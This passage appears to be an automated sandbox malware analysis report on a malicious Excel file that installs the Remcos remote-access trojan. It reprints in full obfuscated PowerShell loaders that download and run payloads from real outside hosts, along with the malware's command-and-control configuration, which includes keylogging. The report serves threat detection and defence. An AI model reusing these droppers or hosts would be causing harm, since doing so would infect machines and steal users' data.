Ar]0X22+'))')))", CommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICA
                  Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,
                  Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3556, TargetFilename: C:\Users\user\AppData\Local\Temp\jdevsgkx.xgo.ps1

                  Data Obfuscation

                  barindex
                  Sigma detected: Dot net compiler compiles file from suspicious location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline", ProcessId: 3760, ProcessName: csc.exe

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 1884, TargetFilename: C:\ProgramData\remcos\logs.dat

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-14T11:05:44.110820+020020241971A Network Trojan was detected192.3.220.4080192.168.2.2249162TCP
                  2024-10-14T11:05:46.327953+020020241971A Network Trojan was detected192.3.220.4080192.168.2.2249164TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-14T11:05:44.110782+020020244491Attempted User Privilege Gain192.168.2.2249162192.3.220.4080TCP
                  2024-10-14T11:05:46.327952+020020244491Attempted User Privilege Gain192.168.2.2249164192.3.220.4080TCP
                  2024-10-14T11:06:06.412128+020020244491Attempted User Privilege Gain192.168.2.2249171192.3.220.4080TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-14T11:06:09.576932+020020204231Exploit Kit Activity Detected192.3.220.4080192.168.2.2249172TCP
                  2024-10-14T11:06:25.520311+020020204231Exploit Kit Activity Detected192.3.220.4080192.168.2.2249177TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-14T11:06:09.576932+020020204251Exploit Kit Activity Detected192.3.220.4080192.168.2.2249172TCP
                  2024-10-14T11:06:25.520311+020020204251Exploit Kit Activity Detected192.3.220.4080192.168.2.2249177TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-14T11:06:13.282795+020020365941Malware Command and Control Activity Detected192.168.2.2249173135.148.195.2486875TCP
                  2024-10-14T11:06:14.272151+020020365941Malware Command and Control Activity Detected192.168.2.2249174135.148.195.2486875TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-14T11:06:08.509149+020020490381A Network Trojan was detected185.199.108.133443192.168.2.2249167TCP
                  2024-10-14T11:06:24.551621+020020490381A Network Trojan was detected185.199.108.133443192.168.2.2249176TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-14T11:06:14.702051+020028033043Unknown Traffic192.168.2.2249175178.237.33.5080TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 0000001F.00000002.509094010.0000000000551000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for submitted file
                  Source: 037002451082_10142024.xlsVirustotal: Detection: 7%Perma Link
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000014.00000002.650605085.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.649655222.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.509094010.0000000000551000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.650009264.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1884, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Machine Learning detection for sample
                  Source: 037002451082_10142024.xlsJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00404423 FreeLibrary,CryptUnprotectData,24_2_00404423
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,31_2_004338C8
                  Source: powershell.exe, 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_c70d7686-4

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.powershell.exe.12d21a28.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.481760106.0000000012B3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2292, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_00407538 _wcslen,CoGetObject,31_2_00407538
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49167 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49176 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49163 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49169 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 150.136.81.248:443 -> 192.168.2.22:49170 version: TLS 1.2
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.pdbhP\ source: powershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000E.00000002.535276986.000007FE89C60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.535388004.000007FE89C40000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D060000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000001E.00000002.524728452.000000001295E000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
